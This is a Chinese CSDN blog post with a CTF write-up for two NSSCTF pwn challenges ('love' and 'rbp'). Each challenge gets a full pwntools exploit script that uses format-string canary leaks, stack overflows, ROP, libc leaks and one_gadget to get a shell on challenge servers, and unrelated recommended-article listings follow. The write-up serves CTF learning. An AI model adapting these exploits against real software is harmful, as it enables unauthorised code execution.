NSSCTF Round#14 Basic. Illuminate with your bril.

最新推荐文章于 2024-06-13 09:54:29 发布
最新推荐文章于 2024-06-13 09:54:29 发布
阅读量164 收藏 1
点赞数
文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_51890658/article/details/132010775
版权

1.love

64位,开了canary,拖入ida分析

有格式化字符串漏洞,可以泄漏canary 当v5==v4时可进入vuln函数

 vuln存在栈溢出漏洞,通过main函数的格式化字符串漏洞实现泄露canary地址,且因为有v6指针指向了v4,用%$n改写v4 为520及可进入vuln,进行栈溢出漏洞泄露system和/bin/sh拿到shell

exp:


from pwn import *
from LibcSearcher import *
from pwnlib import *
import base64
#context.arch="amd64"
sh=remote("node5.anna.nssctf.cn",28836)
#sh=process("./love")
elf=ELF("./love")
libc=ELF("libc.so.6")
#libc=ELF("/lib/x86_64-linux-gnu/libc.so.6")

un=lambda a:sh.recvuntil(a)
rv=lambda a:sh.recv(a)
rl=lambda:sh.recvline()
sd=lambda a:sh.send(a)
sl=lambda a:sh.sendline(a)
Jz=lambda a:u64(sh.recv(6)+"\x00"*2)-libc.sym[a]
inter=lambda :sh.interactive()


un("Toka\n\n")
puts_got=elf.got['puts']
puts=elf.plt['puts']
pop_rdi=0x00000000004013f3
start=0x40125D
ret=0x4012AF

sd("%15$p%502c%9$n")
canary=int(rv(18),16)

un("level\n\n")
sl("a"*0x28+p64(canary)+"a"*8+p64(pop_rdi)+p64(puts_got)+p64(puts)+p64(start))
jz=Jz("puts")
system=jz+libc.sym['system']
bin_sh=jz+libc.search("/bin/sh").next()

print hex(jz)

sl("a"*0x28+p64(canary)+"a"*8+p64(ret)+p64(pop_rdi)+p64(bin_sh)+p64(system))

inter()

2.rbp

在初始化时开启了seccomp_rule_add函数,设置了程序出现溢出时只开启了调用号为59的内核函数,也就是execve函数

通过题名可知使用经典栈迁移来拿shell,但我用了另一种

溢出可以修改返回地址,但需要泄露libc基址,所以要下滑两次到libc_start_main,前两次修改返回地址为vuln地址

下滑到libc_start_main时可修改它的低地址为\x13即可重新返回到main函数,且输出了libc_start_main+240-109的地址,也就获取了libc地址,最后通过onegadget getshell

exp:


from pwn import *
from LibcSearcher import *
from pwnlib import *
import base64
#context.arch="amd64"
sh=remote("node2.anna.nssctf.cn",28698)
#sh=process("./rbp")
elf=ELF("./rbp")
libc=ELF("libc.so.6")
#libc=ELF("/lib/x86_64-linux-gnu/libc.so.6")

un=lambda a:sh.recvuntil(a)
rv=lambda a:sh.recv(a)
rl=lambda:sh.recvline()
sd=lambda a:sh.send(a)
sl=lambda a:sh.sendline(a)
Jz=lambda a:u64(sh.recv(6)+"\x00"*2)-libc.sym[a]
inter=lambda :sh.interactive()

pop_rdi=0x0000000000401353
start=0x401270

un("try it\n")
sd("a"*0x218+p64(start))
sh.recv()
sd("a"*0x218+p64(start))
sh.recv()
sh.recv()
sd("a"*0x218+"\x13")
un("a"*0x218)

jz=Jz("__libc_start_main")-240+109
print hex(jz)

shell=jz+0xebdb3
sd("a"*0x218+p64(shell))

inter()
 

 

Binary..
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 3
    评论
laravel auth.php,Laravel 用户认证 Auth
weixin_42510608的博客
03-20 1282
很多应用是需要登陆后才能操作,Laravel提供了一个auth工具来实现用户的认证功能。并且有一个config/auth.php来配置auth工具。大概看一下auth工具的常用方法Auth::check();// 判断当前用户是否未登录Auth::guest();// 判断当前用户是否未登录,与 check() 相反Auth::guard();// 自定义看守器 默认为 `web`Auth::us...
Laravel Broadcasting广播机制(Redis + socket.io)-学习实例
热门推荐
软件哲学
05-26 1万+
借助Laravel Broadcasting你可以使用上时下很热的Websocket技术。
NSSCTF-[NSSRound#X Basic]ez_z3 && [MoeCTF 2022]Art &&[HDCTF2023]basketball
weixin_61154173的博客
04-27 1261
RGB的初见,DFS代码求多解
[NSSCTF 2nd] NSS两周年纪念赛。
weixin_52640415的博客
08-28 785
ORW代替:openat+readv+writev open+pread64+write 费马小定理逆推 jadx翻译不准确的类型错误。
Codeforces Round #313 (Div. 1) E. Gerald and Path dp 记忆化搜索 stl应用
习惯与规则决定命运
07-25 1159
E. Gerald and Path time limit per test 4 seconds memory limit per test 256 megabytes input standard input output standard output The main walking trail in Geraldion is a
Laravel/Lumen 中使用 Echo + Socket.IO-Client 实现网页即时通讯广播
Right! I'm Max Sky.
04-11 1072
Web 端客户端必须使用^2.0版本,不可使用^3.0或^4.0(Client Demo 中已说明),除非中依赖的socket.io服务版本变更。所以配置中选项是无效的。部分配置项可写在项目根目录的.env启动 WebSocket 服务端,在项目根目录运行;编写广播事件,参考;通过;启动 Web 网页并连接到服务端,连接端口为中的port配置项;使用命令启动队列监听以执行消费,根据示例文件应当在项目根目录运行队列提示消费DONE完成后,事件中方法的返回值将被传送至 Web 端,至此流程结束。
Laravel + Vue 3(Vite、TypeScript)SPA 设置
努力是为了站在万人之中,成为别人的光
01-10 1万+
在本教程中,我将向大家展示如何使用 Laravel + Vue 3 使用 typescript 和 Vite 设置你自己的单页应用程序。这是在 Laravel 项目中添加 PWA 的手动方法。我们不会使用 InertiaJS 或其他类似的东西,我们也不会混合使用。我们将手动实现我们自己的 VueJS 前端。 第 2 步:设置前端 在我们的 laravel 项目中,让我们使用 yarn 运行一个命令,并选择 vue 和 typescript。 将项目名称设置为:FrontEndApp 选择:Vue 选择:Ty
laravel Tinker报错 BadMethodCallException with message 'Call to undefined method Illuminate\Database\...
weixin_30477797的博客
04-16 768
进行模型关联操作, php artisan tinker   执行 $user = App\Models\User::find(1) $user->followings()->attach([2, 3])   报错,模型关联定义都是OK的,google了一番,才发现原来是tinker的bug。直接在控制器中调用就没有报这个错误。如果你用tinker也报...
laravel Method Illuminate\Validation\Validator::validateReuqired does not exist.
dianbian4042的博客
07-27 2105
Method Illuminate\Validation\Validator::validateReuqired does not exist. 此错误是由于我们在配置验证时,写错了关键字, public function rules() { return [ 'file'=>'required', 'fol...
php生成sitemap.xml地图文件
WXiangQian
10-24 1951
php生成sitemap.xml地图文件 文章目录前言什么是Sitemap?sitemap文件遵循指南xml格式详解实战代码sitemap组件代码调用sitemap组件仓库地址实战截图相关问题Sitemap提交后,多久能被百度处理?提交的Sitemap都会被百度抓取并收录吗?XML格式的 Sitemap 中,“priority”提示会影响我的网页在搜索结果中的排名吗?网址在 Sitemap 中的位置是否会影响它的使用?Sitemap中提交的url能否包含中文?
Laravel开发-illuminate-json-guard .zip
10-05
Laravel开发-illuminate-json-guard .zip
Laravel开发-illuminate-vb-auth .zip.zip
10-05
Laravel开发-illuminate-vb-auth .zip.zip
PHP爬虫升级版,基于swoole与QueryList.zip
04-08
**执行方式:CLI** ... **运行环境** ``` ...``` ...2. swoole启动分布式... "illuminate/database":"~4.2" } } 4. Pickup::setRule()方法里写页面采集规则。 5. Server::$count定义开启的爬虫数量。 6. 随机代理,随机age
illuminate.vim-Vim插件,用于自动突出显示光标下方单词的其他用法-Linux开发
05-27
vim-illuminated Vim插件,用于在光标下自动突出显示当前单词的其他用法基本原理所有现代IDE和编辑器都将突出显示光标下的单词,这是一种...默认情况下,Illuminate将突出显示光标下单词的所有用法,但需要进行一些配置
如何在Laravel之外使用illuminate组件详解
10-14
主要给大家介绍了关于如何在Laravel之外使用illuminate组件的相关资料,文中通过示例代码介绍的非常详细,对大家的学习或者工作具有一定的参考学习价值,需要的朋友们下面随着小编来一起学习学习吧
SonarQube安全扫描常见问题
帅小缙的大脑风暴❤
06-11 538
SonarQube质量配置之扫描常见问题与问题修复
振弦采集仪在隧道工程中的安全监测与控制研究
最新发布
duxi222333的博客
06-13 501
通过安装振弦传感器,可以实时监测地下水位的变化情况,并采取相应的措施来保证隧道的安全。通过安装振弦传感器,可以实时监测地层的变形情况,并采取相应的措施来保证隧道的安全。同时,振弦采集仪也可以用于隧道施工期间的地层补偿控制,以减少地层的变形对施工的影响。总结,隧道工程的安全监测与控制是非常重要的工作,而振弦采集仪作为一种高精度和灵敏度的仪器,可以有效地监测和控制隧道工程中的地层变形、地下水位变化和地震影响等情况。振弦采集仪具有高精度和灵敏度的特点,能够对隧道工程中发生的微小变形进行准确的监测和控制。
展会邀请 | 龙智即将亮相2024上海国际嵌入式展,带来安全合规、单一可信数据源、可追溯、高效协同的嵌入式开发解决方案
weixin_49715102的博客
06-09 982
凭借在DevSecOps领域的深厚积累,龙智在全球范围内遴选优秀的专业工具,为嵌入式开发行业打造了专属的嵌入式开发解决方案,并提供专业咨询、方案定制、实施部署、专业培训、定制开发等一站式服务支持。等全球专业工具,覆盖嵌入式软件单元测试、静态代码分析、需求管理、版本控制、生命周期管理及项目管理、知识库管理等领域,助力企业实现安全合规、可追溯、单一可信数据源、高效协同的嵌入式开发。并且嵌入式系统往往非常复杂,需要全面的测试覆盖、高效的测试执行,才能确保系统的可靠性和正确性,以及产品的及时交付。
《软件定义安全》之八:软件定义安全案例
大龄IT民工
06-13 1212
Embrane是一家虚拟设备提供商,由Cisco公司前员工创立,该公司致力于实现网络功能实体的软件化,旨在研发出多服务、分布式软件架构的网络服务产品。它于2015年4月被Cisco公司收购。Embrane的软件定义架构称为Heleos,利用虚拟通信设备代替原有基于专有硬件平台的设备,通过一个集中的控制台对虚拟设备进行管理和控制。Heleos与原来的应用交付网络(ADN)产品较为接近,是基于软件的L4~L7虚拟设备,包括负载均衡产品、防火墙、VPN产品和SSLOffload Engine。
laravel8 框架报错Illuminate\Encryption\MissingAppKeyException No application encryption key has been specified.
05-31
这个错误通常是因为您在使用 Laravel 的加密功能时,没有设置应用程序的密钥。要解决这个问题,您可以运行以下命令来生成应用程序密钥: ``` ...``` 运行该命令后,您应该能够在应用程序的 `.env` 文件中看到一个名为...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值